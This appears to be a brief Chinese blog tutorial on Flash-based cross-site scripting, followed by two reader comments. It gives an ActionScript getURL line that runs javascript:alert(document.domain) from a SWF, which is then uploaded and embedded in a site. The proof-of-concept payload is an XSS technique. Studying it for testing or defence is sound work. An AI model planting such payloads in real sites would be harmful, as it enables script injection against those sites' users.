FLASH的XSS

getURL("javascript:alert(document.domain)","_self");
Image.png



插入代码,


getURL("javascript:alert(document.domain)","_self");


然后保存swf

Image [2].png


上传,然后插入


Image [2] (3).png



相关推荐

发表评论

路人甲
看不清楚?点图切换

网友评论(2)

无时无刻不想到xss滑稽
无人小站 6年前 (2017-09-10) 回复
惊讶。。!!!
森七 6年前 (2017-09-04) 回复